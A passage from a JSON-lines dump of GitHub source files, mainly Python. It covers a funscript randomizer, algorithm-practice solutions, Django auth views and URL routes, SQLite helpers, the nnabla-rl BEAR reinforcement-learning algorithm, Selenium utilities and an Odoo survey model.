80:\n return 2\n if number <= 90:\n return 3\n if number <= 100:\n return 4\n\n\ndef randomize_actions(data):\n actions = data['actions']\n count = 0\n state = get_random_state()\n\n# 0 is normal, no change\n# 1 is 0 - 50\n# 2 is 50 - 100\n# 3 is 60 - 80\n# 4 is 70 - 100\n\n for i, action in enumerate(actions):\n if count == 20:\n count = 0\n state = get_random_state()\n \n if state == 0:\n count += 1\n continue\n\n if state == 1 and action['pos'] >= 90:\n count += 1\n action['pos'] = 60\n actions[i] = action\n continue\n\n if state == 2 and action['pos'] <= 10:\n count += 1\n action['pos'] = 40\n actions[i] = action\n continue\n\n if state == 3 and action['pos'] >= 90:\n count += 1\n action['pos'] = 80\n actions[i] = action\n continue\n\n if state == 3 and action['pos'] <= 10:\n count += 1\n action['pos'] = 40\n actions[i] = action\n continue\n\n if state == 4 and action['pos'] <= 10:\n count += 1\n action['pos'] = 70\n actions[i] = action\n continue\n\n if state == 4 and action['pos'] >= 90:\n count += 1\n action['pos'] = 100\n actions[i] = action\n continue\n\n return actions\n\n\ndef read_funscript(file_path):\n data = {}\n with open(file_path, 'r') as f:\n data = json.load(f)\n data['actions'] = randomize_actions(data)\n\n with open(f'newfs.funscript', 'w') as f:\n f.write(json.dumps(data))\n\n\ndef main(args):\n read_funscript(args[1])\n\n\nif __name__ == '__main__':\n main(sys.argv)\n\n","repo_name":"KevynKelso/scripts","sub_path":"bin/sync_mod_fscript.py","file_name":"sync_mod_fscript.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6106089437","text":"# 1 ~ 6 개의 줄\n# 줄마다 P 개의 프렛으로 나누어져 있음\n# 프렛의 번호도 1 ~ P\n# 한 번 누르거나 떼는 것을 손가락을 한 번 움직였다고 한다.\n# 손가락의 가장 적게 움직이는 회수를 구하기\n#\n# 음의 수 N과 한 줄에 있는 프렛의 수 P가 주어진다.\n# (1 ≤ N ≤ 500,000, 2 ≤ P ≤ 300,000)\n\nimport sys\n\ninput = sys.stdin.readline\n\n# N 줄에 해당하는 배열 각 인덱스에 스택을 쌓아\n# 스택 맨 위 숫자보다 큰 게 들어오면 그대로 쌓고\n# 작은 게 들어오면 들어온 수가 제일 클 때까지 pop 후 스택에 저장\n\nN, P = map(int, input().split())\n\n# 최대 6개 1~6 인덱스\nstk = [[] for _ in range(7)]\ncnt = 0\n# print(stk)\n\nfor _ in range(N):\n n, p = map(int, input().split())\n while stk[n] and stk[n][-1] > p:\n stk[n].pop()\n cnt += 1\n if not stk[n] or stk[n][-1] < p:\n stk[n].append(p)\n cnt += 1\n elif stk[n] and stk[n][-1] == p:\n continue\n\n\nprint(cnt)\n","repo_name":"TwOneZero/algorithm-study-note","sub_path":"PS_Study_문제풀이/중요문제풀기/2841re.py","file_name":"2841re.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12672123887","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import View\n\nfrom . import forms\n\n\nclass LoginPage(View):\n form_class = forms.LoginForm\n template_name = 'authentication/login.html'\n\n def get(self, request):\n form = self.form_class()\n\n return render(\n request, self.template_name, context={'form': form}\n )\n\n def post(self, request):\n form = self.form_class(request.POST)\n message = ''\n\n if form.is_valid():\n user = authenticate(\n username=form.cleaned_data['username'],\n password=form.cleaned_data['password'],\n )\n if user is not None:\n login(request, user)\n return redirect('feed')\n else:\n message = 'Identifications invalides'\n return render(\n request, self.template_name, context={\n 'form': form,\n 'message': message,\n }\n )\n\n\nclass SignUpPage(View):\n form_class = forms.SignUpForm\n template_name = 'authentication/signup.html'\n\n def get(self, request):\n form = self.form_class()\n return render(request, self.template_name, context={'form': form})\n\n def post(self, request):\n form = self.form_class(request.POST)\n print(request.POST)\n\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect('feed')\n\n return render(request, self.template_name, context={'form': form})\n\n\ndef logout_user(request):\n logout(request)\n return redirect('login')\n","repo_name":"johnchem/OCProjet_LITReview","sub_path":"litreview/authentication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"23992163133","text":"\"\"\"AI URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom .views import *\n\n\nurlpatterns = [\n # path for each model separately\n path('predict/api/', predict_request, name='predict_request'),\n path('predict/', predict, name='predict'),\n #\n path('predict_MobileNet/api/', predict_MobileNet_request,\n name='predict_MobileNet_request'),\n path('predict_MobileNet/', predict_MobileNet, name='predict_MobileNet'),\n path('predict_InceptionResNetV2/api/', predict_InceptionResNetV2_request,\n name='predict_InceptionResNetV2_request'),\n path('predict_InceptionResNetV2/', predict_InceptionResNetV2, name='predict_InceptionResNetV2'),\n ##\n path('predict_MobileNetV2/api/', predict_MobileNetV2_request, name='predict_MobileNetV2_request'),\n path('predict_MobileNetV2/', predict_MobileNetV2, name='predict_MobileNetV2'),\n path('predict_Xception/api/', predict_Xception_request,\n name='predict_Xception_request'),\n path('predict_Xception/', predict_Xception, name='predict_Xception'),\n #\n path('predict_VGG16/api/', predict_VGG16_request,\n name='predict_VGG16_request'),\n path('predict_VGG16/', predict_VGG16, name='predict_VGG16'),\n ##\n path('predict_VGG19/api/', predict_VGG19_request,\n name='predict_VGG19_request'),\n path('predict_VGG19/', predict_VGG19, name='predict_VGG19'),\n\n path('predict_DenseNet121/api/', predict_DenseNet121_request,\n name='predict_DenseNet121_request'),\n path('predict_DenseNet121/', predict_DenseNet121, name='predict_DenseNet121'),\n path('predict_DenseNet169/api/', predict_DenseNet169_request,\n name='predict_DenseNet169_request'),\n path('predict_DenseNet169/', predict_DenseNet169, name='predict_DenseNet169'),\n path('predict_DenseNet201/api/', predict_DenseNet201_request,\n name='predict_DenseNet201_request'),\n path('predict_DenseNet201/', predict_DenseNet201, name='predict_DenseNet201'),\n\n path('predict_InceptionV3/api/', predict_InceptionV3_request,\n name='predict_InceptionV3_request'),\n path('predict_InceptionV3/', predict_InceptionV3, name='predict_InceptionV3'),\n path('predict_NASNetMobile/api/', predict_NASNetMobile_request,\n name='predict_NASNetMobile_request'),\n path('predict_NASNetMobile/', predict_NASNetMobile, name='predict_NASNetMobile'),\n path('predict_NASNetLarge/api/', predict_NASNetLarge_request,\n name='predict_NASNetLarge_request'),\n path('predict_NASNetLarge/', predict_NASNetLarge, name='predict_NASNetLarge'),\n]","repo_name":"nature1995/AI-Image-classifiers-on-Django-with-RESTAPI","sub_path":"apps/identification/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"75"} +{"seq_id":"19548799464","text":"import sys\nfrom os import path\nif path.exists('input.txt'):\n sys.stdin = open(\"input.txt\", \"r\")\n\nn,m = map(int, input().split())\ntrees=list(map(int,input().split()))\n\n\n\ndef treecut(h):\n total=0\n for tree in trees:\n if tree>h:\n total+=tree-h\n return total\n\nstart=1\nend=max(trees)\nwhile start<=end:\n mid=(start+end)//2\n\n total=treecut(mid)\n if total>=m:\n start=mid+1\n\n else:\n end=mid-1\nprint(end)\n","repo_name":"seok9924/PythonCodingTest","sub_path":"BoJ/class2/2805.py","file_name":"2805.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29553095072","text":"from collections import namedtuple\nfrom typing import Iterable, Optional\n\nfrom animanager.files import AnimeFiles\nfrom animanager.sqlite import upsert\n\nfrom .status import cache_status, get_complete\n\nPriorityRule = namedtuple(\n 'PriorityRule',\n ['id', 'regexp', 'priority'])\n\n\ndef get_priority_rules(db) -> Iterable[PriorityRule]:\n \"\"\"Get file priority rules.\"\"\"\n cur = db.cursor()\n cur.execute('SELECT id, regexp, priority FROM file_priority')\n for row in cur:\n yield PriorityRule(*row)\n\n\ndef add_priority_rule(\n db, regexp: str, priority: Optional[int] = None,\n) -> int:\n \"\"\"Add a file priority rule.\"\"\"\n with db:\n cur = db.cursor()\n if priority is None:\n cur.execute('SELECT MAX(priority) FROM file_priority')\n highest_priority = cur.fetchone()[0]\n if highest_priority is None:\n priority = 1\n else:\n priority = highest_priority + 1\n cur.execute(\"\"\"\n INSERT INTO file_priority (regexp, priority)\n VALUES (?, ?)\"\"\", (regexp, priority))\n row_id = db.last_insert_rowid()\n return row_id\n\n\ndef delete_priority_rule(db, rule_id: int) -> None:\n \"\"\"Delete a file priority rule.\"\"\"\n with db:\n cur = db.cursor()\n cur.execute('DELETE FROM file_priority WHERE id=?', (rule_id,))\n\n\ndef cache_files(db, aid: int, anime_files: AnimeFiles) -> None:\n \"\"\"Cache files for anime.\"\"\"\n with db:\n cache_status(db, aid)\n db.cursor().execute(\n \"\"\"UPDATE cache_anime\n SET anime_files=?\n WHERE aid=?\"\"\",\n (anime_files.to_json(), aid))\n\n\ndef get_files(conn, aid: int) -> AnimeFiles:\n \"\"\"Get cached files for anime.\"\"\"\n with conn:\n cur = conn.cursor().execute(\n 'SELECT anime_files FROM cache_anime WHERE aid=?',\n (aid,))\n row = cur.fetchone()\n if row is None:\n raise ValueError('No cached files')\n return AnimeFiles.from_json(row[0])\n\n\ndef set_regexp(db, aid, regexp):\n \"\"\"Set watching regexp for anime.\"\"\"\n upsert(db, 'watching', ['aid'], {'aid': aid, 'regexp': regexp})\n\n\ndef delete_regexp(db, aid):\n \"\"\"Delete watching regexp for anime.\"\"\"\n db.cursor().execute(\n \"\"\"DELETE FROM watching WHERE aid=?\"\"\",\n (aid,))\n\n\ndef delete_regexp_complete(db):\n \"\"\"Delete watching regexp for complete anime.\"\"\"\n db.cursor().executemany(\n \"\"\"DELETE FROM watching WHERE aid=?\"\"\",\n ((aid,) for aid in get_complete(db)))\n","repo_name":"darkfeline/animanager","sub_path":"animanager/db/query/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"8861983675","text":"from dataclasses import dataclass\nfrom typing import Any, Dict, List, Optional, Union\n\nimport gym\nimport numpy as np\n\nimport nnabla as nn\nimport nnabla.functions as NF\nimport nnabla.solvers as NS\nimport nnabla_rl.functions as RF\nimport nnabla_rl.model_trainers as MT\nfrom nnabla_rl.algorithm import Algorithm, AlgorithmConfig, eval_api\nfrom nnabla_rl.algorithms.common_utils import has_batch_dimension\nfrom nnabla_rl.builders import ModelBuilder, SolverBuilder\nfrom nnabla_rl.environments.environment_info import EnvironmentInfo\nfrom nnabla_rl.model_trainers.model_trainer import ModelTrainer, TrainingBatch\nfrom nnabla_rl.models import (BEARPolicy, DeterministicPolicy, QFunction, StochasticPolicy, TD3QFunction,\n UnsquashedVariationalAutoEncoder, VariationalAutoEncoder)\nfrom nnabla_rl.utils import context\nfrom nnabla_rl.utils.data import add_batch_dimension, marshal_experiences, set_data_to_variable\nfrom nnabla_rl.utils.misc import create_variable, sync_model\n\n\n@dataclass\nclass BEARConfig(AlgorithmConfig):\n \"\"\"BEARConfig List of configurations for BEAR algorithm.\n\n Args:\n gamma (float): discount factor of rewards. Defaults to 0.99.\n learning_rate (float): learning rate which is set to all solvers. \\\n You can customize/override the learning rate for each solver by implementing the \\\n (:py:class:`SolverBuilder `) by yourself. \\\n Defaults to 0.001.\n batch_size (int): training batch size. Defaults to 100.\n tau (float): target network's parameter update coefficient. Defaults to 0.005.\n lmb (float): weight :math:`\\\\lambda` used for balancing the ratio between :math:`\\\\min{Q}` and :math:`\\\\max{Q}`\\\n on target q value generation (i.e. :math:`\\\\lambda\\\\min{Q} + (1 - \\\\lambda)\\\\max{Q}`).\\\n Defaults to 0.75.\n epsilon (float): inequality constraint of dual gradient descent. Defaults to 0.05.\n num_q_ensembles (int): number of q ensembles . Defaults to 2.\n num_mmd_actions (int): number of actions to sample for computing maximum mean discrepancy (MMD). Defaults to 5.\n num_action_samples (int): number of actions to sample for computing target q values. Defaults to 10.\n mmd_type (str): kernel type used for MMD computation. laplacian or gaussian is supported. Defaults to gaussian.\n mmd_sigma (float): parameter used for adjusting the MMD. Defaults to 20.0.\n initial_lagrange_multiplier (float, optional): Initial value of lagrange multiplier. \\\n If not specified, random value sampled from normal distribution will be used instead.\n fix_lagrange_multiplier (bool): Either to fix the lagrange multiplier or not. Defaults to False.\n warmup_iterations (int): Number of iterations until start updating the policy. Defaults to 20000\n use_mean_for_eval (bool): Use mean value instead of best action among the samples for evaluation.\\\n Defaults to False.\n \"\"\"\n gamma: float = 0.99\n learning_rate: float = 1e-3\n batch_size: int = 100\n tau: float = 0.005\n lmb: float = 0.75\n epsilon: float = 0.05\n num_q_ensembles: int = 2\n num_mmd_actions: int = 5\n num_action_samples: int = 10\n mmd_type: str = 'gaussian'\n mmd_sigma: float = 20.0\n initial_lagrange_multiplier: Optional[float] = None\n fix_lagrange_multiplier: bool = False\n warmup_iterations: int = 20000\n use_mean_for_eval: bool = False\n\n def __post_init__(self):\n \"\"\"__post_init__\n\n Check set values are in valid range.\n \"\"\"\n if not ((0.0 <= self.tau) & (self.tau <= 1.0)):\n raise ValueError('tau must lie between [0.0, 1.0]')\n if not ((0.0 <= self.gamma) & (self.gamma <= 1.0)):\n raise ValueError('gamma must lie between [0.0, 1.0]')\n if not (0 <= self.num_q_ensembles):\n raise ValueError('num q ensembles must not be negative')\n if not (0 <= self.num_mmd_actions):\n raise ValueError('num mmd actions must not be negative')\n if not (0 <= self.num_action_samples):\n raise ValueError('num action samples must not be negative')\n if not (0 <= self.warmup_iterations):\n raise ValueError('warmup iterations must not be negative')\n if not (0 <= self.batch_size):\n raise ValueError('batch size must not be negative')\n\n\nclass DefaultQFunctionBuilder(ModelBuilder[QFunction]):\n def build_model(self, # type: ignore[override]\n scope_name: str,\n env_info: EnvironmentInfo,\n algorithm_config: BEARConfig,\n **kwargs) -> QFunction:\n return TD3QFunction(scope_name)\n\n\nclass DefaultPolicyBuilder(ModelBuilder[StochasticPolicy]):\n def build_model(self, # type: ignore[override]\n scope_name: str,\n env_info: EnvironmentInfo,\n algorithm_config: BEARConfig,\n **kwargs) -> StochasticPolicy:\n return BEARPolicy(scope_name, env_info.action_dim)\n\n\nclass DefaultVAEBuilder(ModelBuilder[VariationalAutoEncoder]):\n def build_model(self, # type: ignore[override]\n scope_name: str,\n env_info: EnvironmentInfo,\n algorithm_config: BEARConfig,\n **kwargs) -> VariationalAutoEncoder:\n return UnsquashedVariationalAutoEncoder(scope_name,\n env_info.state_dim,\n env_info.action_dim,\n env_info.action_dim*2)\n\n\nclass DefaultSolverBuilder(SolverBuilder):\n def build_solver(self, # type: ignore[override]\n env_info: EnvironmentInfo,\n algorithm_config: BEARConfig,\n **kwargs) -> nn.solver.Solver:\n return NS.Adam(alpha=algorithm_config.learning_rate)\n\n\nclass BEAR(Algorithm):\n \"\"\"Bootstrapping Error Accumulation Reduction (BEAR) algorithm.\n\n This class implements the Bootstrapping Error Accumulation Reduction (BEAR) algorithm\n proposed by A. Kumar, et al. in the paper: \"Stabilizing Off-Policy Q-learning via Bootstrapping Error Reduction\"\n For details see: https://arxiv.org/abs/1906.00949\n\n This algorithm only supports offline training.\n\n Args:\n env_or_env_info \\\n (gym.Env or :py:class:`EnvironmentInfo `):\n the environment to train or environment info\n config (:py:class:`BEARConfig `):\n configuration of the BEAR algorithm\n q_function_builder (:py:class:`ModelBuilder[QFunction] `):\n builder of q-function models\n q_solver_builder (:py:class:`SolverBuilder `):\n builder for q-function solvers\n pi_function_builder (:py:class:`ModelBuilder[StochasticPolicy] `):\n builder of policy models\n pi_solver_builder (:py:class:`SolverBuilder `):\n builder for policy solvers\n vae_builder (:py:class:`ModelBuilder[VariationalAutoEncoder] `):\n builder of variational auto encoder models\n vae_solver_builder (:py:class:`SolverBuilder `):\n builder for variational auto encoder solvers\n lagrange_solver_builder (:py:class:`SolverBuilder `):\n builder for lagrange multiplier solver\n \"\"\"\n\n # type declarations to type check with mypy\n # NOTE: declared variables are instance variable and NOT class variable, unless it is marked with ClassVar\n # See https://mypy.readthedocs.io/en/stable/class_basics.html for details\n _config: BEARConfig\n _q_ensembles: List[QFunction]\n _q_solvers: Dict[str, nn.solver.Solver]\n _target_q_ensembles: List[QFunction]\n _pi: StochasticPolicy\n _pi_solver: nn.solver.Solver\n _target_pi: StochasticPolicy\n _vae: VariationalAutoEncoder\n _vae_solver: nn.solver.Solver\n _lagrange: MT.policy_trainers.bear_policy_trainer.AdjustableLagrangeMultiplier\n _lagrange_solver: nn.solver.Solver\n _q_function_trainer: ModelTrainer\n _encoder_trainer: ModelTrainer\n _policy_trainer: ModelTrainer\n _eval_state_var: nn.Variable\n _eval_action: nn.Variable\n _eval_max_index: nn.Variable\n\n _encoder_trainer_state: Dict[str, Any]\n _policy_trainer_state: Dict[str, Any]\n _q_function_trainer_state: Dict[str, Any]\n\n def __init__(self, env_or_env_info: Union[gym.Env, EnvironmentInfo],\n config: BEARConfig = BEARConfig(),\n q_function_builder: ModelBuilder[QFunction] = DefaultQFunctionBuilder(),\n q_solver_builder: SolverBuilder = DefaultSolverBuilder(),\n pi_builder: ModelBuilder[StochasticPolicy] = DefaultPolicyBuilder(),\n pi_solver_builder: SolverBuilder = DefaultSolverBuilder(),\n vae_builder: ModelBuilder[VariationalAutoEncoder] = DefaultVAEBuilder(),\n vae_solver_builder: SolverBuilder = DefaultSolverBuilder(),\n lagrange_solver_builder: SolverBuilder = DefaultSolverBuilder()):\n super(BEAR, self).__init__(env_or_env_info, config=config)\n\n with nn.context_scope(context.get_nnabla_context(self._config.gpu_id)):\n self._q_ensembles = []\n self._q_solvers = {}\n self._target_q_ensembles = []\n for i in range(self._config.num_q_ensembles):\n q = q_function_builder(scope_name=\"q{}\".format(\n i), env_info=self._env_info, algorithm_config=self._config)\n target_q = q_function_builder(\n scope_name=\"target_q{}\".format(i), env_info=self._env_info, algorithm_config=self._config)\n self._q_ensembles.append(q)\n self._q_solvers[q.scope_name] = q_solver_builder(env_info=self._env_info, algorithm_config=self._config)\n self._target_q_ensembles.append(target_q)\n\n self._pi = pi_builder(scope_name=\"pi\", env_info=self._env_info, algorithm_config=self._config)\n self._pi_solver = pi_solver_builder(env_info=self._env_info, algorithm_config=self._config)\n self._target_pi = pi_builder(scope_name=\"target_pi\", env_info=self._env_info, algorithm_config=self._config)\n\n self._vae = vae_builder(scope_name=\"vae\", env_info=self._env_info, algorithm_config=self._config)\n self._vae_solver = vae_solver_builder(env_info=self._env_info, algorithm_config=self._config)\n\n self._lagrange = MT.policy_trainers.bear_policy_trainer.AdjustableLagrangeMultiplier(\n scope_name=\"alpha\",\n initial_value=self._config.initial_lagrange_multiplier)\n self._lagrange_solver = lagrange_solver_builder(env_info=self._env_info, algorithm_config=self._config)\n\n @eval_api\n def compute_eval_action(self, state, *, begin_of_episode=False, extra_info={}):\n if has_batch_dimension(state, self._env_info):\n raise RuntimeError(f'{self.__name__} does not support batched state!')\n with nn.context_scope(context.get_nnabla_context(self._config.gpu_id)):\n state = add_batch_dimension(state)\n if not hasattr(self, '_eval_state_var'):\n self._eval_state_var = create_variable(1, self._env_info.state_shape)\n if self._config.use_mean_for_eval:\n eval_distribution = self._pi.pi(self._eval_state_var)\n self._eval_action = NF.tanh(eval_distribution.mean())\n else:\n repeat_num = 100\n if isinstance(self._eval_state_var, tuple):\n state_var = tuple(RF.repeat(x=s_var, repeats=repeat_num, axis=0)\n for s_var in self._eval_state_var)\n else:\n state_var = RF.repeat(x=self._eval_state_var, repeats=repeat_num, axis=0)\n assert state_var.shape == (repeat_num, self._eval_state_var.shape[1])\n\n eval_distribution = self._pi.pi(state_var)\n self._eval_action = NF.tanh(eval_distribution.sample())\n q_values = self._q_ensembles[0].q(state_var, self._eval_action)\n self._eval_max_index = RF.argmax(q_values, axis=0)\n\n set_data_to_variable(self._eval_state_var, state)\n if self._config.use_mean_for_eval:\n self._eval_action.forward()\n return np.squeeze(self._eval_action.d, axis=0)\n else:\n nn.forward_all([self._eval_action, self._eval_max_index])\n return self._eval_action.d[self._eval_max_index.d[0]]\n\n def _before_training_start(self, env_or_buffer):\n # set context globally to ensure that the training runs on configured gpu\n context.set_nnabla_context(self._config.gpu_id)\n self._encoder_trainer = self._setup_encoder_training(env_or_buffer)\n self._q_function_trainer = self._setup_q_function_training(env_or_buffer)\n self._policy_trainer = self._setup_policy_training(env_or_buffer)\n\n def _setup_encoder_training(self, env_or_buffer):\n trainer_config = MT.encoder_trainers.KLDVariationalAutoEncoderTrainerConfig()\n\n # Wrapper for squashing reconstructed action during vae training\n class SquashedActionVAE(VariationalAutoEncoder):\n def __init__(self, original_vae):\n super().__init__(original_vae.scope_name)\n self._original_vae = original_vae\n\n def encode_and_decode(self, s, **kwargs):\n latent_distribution, reconstructed = self._original_vae.encode_and_decode(s, **kwargs)\n return latent_distribution, NF.tanh(reconstructed)\n\n def encode(self, *args): raise NotImplementedError\n def decode(self, *args): raise NotImplementedError\n def decode_multiple(self, decode_num, *args): raise NotImplementedError\n def latent_distribution(self, *args): raise NotImplementedError\n\n squashed_action_vae = SquashedActionVAE(self._vae)\n encoder_trainer = MT.encoder_trainers.KLDVariationalAutoEncoderTrainer(\n models=squashed_action_vae,\n solvers={self._vae.scope_name: self._vae_solver},\n env_info=self._env_info,\n config=trainer_config)\n return encoder_trainer\n\n def _setup_q_function_training(self, env_or_buffer):\n # This is a wrapper class which outputs the target action for next state in q function training\n class PerturbedPolicy(DeterministicPolicy):\n def __init__(self, target_pi):\n super().__init__(target_pi.scope_name)\n self._target_pi = target_pi\n\n def pi(self, s):\n policy_distribution = self._target_pi.pi(s)\n return NF.tanh(policy_distribution.sample())\n target_policy = PerturbedPolicy(self._target_pi)\n\n trainer_config = MT.q_value.BCQQTrainerConfig(reduction_method='mean',\n num_action_samples=self._config.num_action_samples,\n lmb=self._config.lmb)\n q_function_trainer = MT.q_value.BCQQTrainer(\n train_functions=self._q_ensembles,\n solvers=self._q_solvers,\n target_functions=self._target_q_ensembles,\n target_policy=target_policy,\n env_info=self._env_info,\n config=trainer_config)\n for q, target_q in zip(self._q_ensembles, self._target_q_ensembles):\n sync_model(q, target_q, 1.0)\n return q_function_trainer\n\n def _setup_policy_training(self, env_or_buffer):\n trainer_config = MT.policy_trainers.BEARPolicyTrainerConfig(\n num_mmd_actions=self._config.num_mmd_actions,\n mmd_type=self._config.mmd_type,\n epsilon=self._config.epsilon,\n fix_lagrange_multiplier=self._config.fix_lagrange_multiplier,\n warmup_iterations=self._config.warmup_iterations-self._iteration_num)\n\n class SquashedActionQ(QFunction):\n def __init__(self, original_q):\n super().__init__(original_q.scope_name)\n self._original_q = original_q\n\n def q(self, s, a):\n squashed_action = NF.tanh(a)\n return self._original_q.q(s, squashed_action)\n\n wrapped_qs = [SquashedActionQ(q) for q in self._q_ensembles]\n policy_trainer = MT.policy_trainers.BEARPolicyTrainer(\n models=self._pi,\n solvers={self._pi.scope_name: self._pi_solver},\n q_ensembles=wrapped_qs,\n vae=self._vae,\n lagrange_multiplier=self._lagrange,\n lagrange_solver=self._lagrange_solver,\n env_info=self._env_info,\n config=trainer_config)\n sync_model(self._pi, self._target_pi, 1.0)\n\n return policy_trainer\n\n def _run_online_training_iteration(self, env):\n raise NotImplementedError\n\n def _run_offline_training_iteration(self, buffer):\n self._bear_training(buffer)\n\n def _bear_training(self, replay_buffer):\n experiences, info = replay_buffer.sample(self._config.batch_size)\n (s, a, r, non_terminal, s_next, *_) = marshal_experiences(experiences)\n batch = TrainingBatch(batch_size=self._config.batch_size,\n s_current=s,\n a_current=a,\n gamma=self._config.gamma,\n reward=r,\n non_terminal=non_terminal,\n s_next=s_next,\n weight=info['weights'])\n\n self._q_function_trainer_state = self._q_function_trainer.train(batch)\n for q, target_q in zip(self._q_ensembles, self._target_q_ensembles):\n sync_model(q, target_q, tau=self._config.tau)\n td_errors = self._q_function_trainer_state['td_errors']\n replay_buffer.update_priorities(td_errors)\n\n self._encoder_trainer_state = self._encoder_trainer.train(batch)\n self._policy_trainer_state = self._policy_trainer.train(batch)\n sync_model(self._pi, self._target_pi, tau=self._config.tau)\n\n def _models(self):\n models = [*self._q_ensembles, *self._target_q_ensembles,\n self._pi, self._target_pi, self._vae,\n self._lagrange]\n return {model.scope_name: model for model in models}\n\n def _solvers(self):\n solvers = {}\n solvers.update(self._q_solvers)\n solvers[self._pi.scope_name] = self._pi_solver\n solvers[self._vae.scope_name] = self._vae_solver\n if not self._config.fix_lagrange_multiplier:\n solvers[self._lagrange.scope_name] = self._lagrange_solver\n return solvers\n\n @classmethod\n def is_supported_env(cls, env_or_env_info):\n env_info = EnvironmentInfo.from_env(env_or_env_info) if isinstance(env_or_env_info, gym.Env) \\\n else env_or_env_info\n return not env_info.is_discrete_action_env() and not env_info.is_tuple_action_env()\n\n @property\n def latest_iteration_state(self):\n latest_iteration_state = super(BEAR, self).latest_iteration_state\n if hasattr(self, '_encoder_trainer_state'):\n latest_iteration_state['scalar'].update(\n {'encoder_loss': float(self._encoder_trainer_state['encoder_loss'])})\n if hasattr(self, '_policy_trainer_state'):\n latest_iteration_state['scalar'].update({'pi_loss': float(self._policy_trainer_state['pi_loss'])})\n if hasattr(self, '_q_function_trainer_state'):\n latest_iteration_state['scalar'].update({'q_loss': float(self._q_function_trainer_state['q_loss'])})\n latest_iteration_state['histogram'].update({'td_errors': self._q_function_trainer_state['td_errors']})\n return latest_iteration_state\n\n @property\n def trainers(self):\n return {\n \"encoder\": self._encoder_trainer,\n \"q_function\": self._q_function_trainer,\n \"policy\": self._policy_trainer,\n }\n","repo_name":"sony/nnabla-rl","sub_path":"nnabla_rl/algorithms/bear.py","file_name":"bear.py","file_ext":"py","file_size_in_byte":20525,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"75"} +{"seq_id":"40371182926","text":"import json\nimport os\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.ui import Select\nfrom selenium import webdriver\nfrom time import sleep\n\ndef jq(el):\n return seleniumXpathEngine.driver.execute_script(el)\n\nclass OperationJson:\n def __init__(self,file_name=None):\n if file_name:\n self.file_name = file_name\n else:\n self.file_name = './package.json'\n self.data = self.get_data()\n\n def get_data(self):\n fp = open(self.file_name)\n data = json.load(fp)\n fp.close()\n return data\n\n def get_value(self,id):\n return self.data[id]\n\ndef getTag():\n return \"feature/v\"+OperationJson(os.path.join(os.getcwd() + \"/package.json\")).get_value('version')\n\n\nclass SeleniumXpathEngine:\n def __init__(self,url):\n self.driver = webdriver.Chrome()\n self.driver.get(url)\n\n\n def setJquery(self):\n if self.driver.execute_script('return typeof(jQuery) === \"undefined\"'):\n jQuerify = open(os.path.join(os.getcwd() + '/bin/jquery-1.7.2.min.js'), \"r+\").read()\n self.driver.execute_script(jQuerify)\n sleep(1)\n\n def xPathClick(self,xPath,info=\"\"):\n try:\n return self.driver.find_element_by_xpath(xPath).click()\n except:\n print(info + \"--点击未触发\")\n\n def text(self,select,text,info=\"\"):\n try:\n self.setJquery()\n self.driver.execute_script('$(\"'+select+'\")[0].focus()')\n sleep(2)\n self.driver.execute_script('$(\"'+select+'\").val(\"'+ text +'\")')\n sleep(2)\n self.driver.execute_script('$(\"'+select+'\")[0].dispatchEvent(new Event(\"input\"))')\n except:\n print(info + \"--写入未触发\")\n def xPathSelect(self,xPath,text,info=\"\"):\n try:\n selectTag = Select(self.driver.find_element_by_xpath(xPath))\n selectTag.select_by_value(text)\n except:\n print(info + \"--未触发\")\n def window(self,no,info=\"\"):\n try:\n self.driver.switch_to.window(self.driver.window_handles[no])\n except:\n print(info + \"--未触发切换第\"+no+\"窗口\")\n def scroll(self,dom,height,info=\"\"):\n try:\n self.setJquery()\n sleep(2)\n self.driver.execute_script(\"$('\"+dom+\"').scrollTop(\"+height+\")\")\n except:\n print(info + \"--未触发\")\n\n\n","repo_name":"aiyuekuang/umiTemplate","sub_path":"bin/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73029823921","text":"from odoo import fields, models, api\n\n\nclass SurveyQuestion(models.Model):\n\n _inherit = 'survey.question'\n\n max_score = fields.Integer(\n compute='_compute_max_score',\n string='Max Score',\n help='Max score an answer of this question can get',\n store=True,\n )\n\n objective_id = fields.Many2one(\n 'survey.question.objective',\n string='Objective',\n )\n level_id = fields.Many2one(\n 'survey.question.level',\n string='Level',\n )\n content_id = fields.Many2one(\n 'survey.question.content',\n string='Content',\n )\n\n score_calc_method = fields.Selection(\n [('direct_sum', 'Direct Sum'),\n ('ranges', 'Ranges')],\n string='Score Method',\n help=\"Choose\"\n \"-Direct Sum if you want to sum the values \"\n \" assigned to questions answers.\"\n \"-Ranges if you want to define ranges for correct answers.\",\n default='direct_sum',)\n score_ranges_ids = fields.One2many(\n 'survey.question.score.range',\n 'survey_question_id',\n string='Ranges',\n )\n copy_labels_ids = fields.One2many(\n 'survey.label',\n related='labels_ids',\n string='Suggested 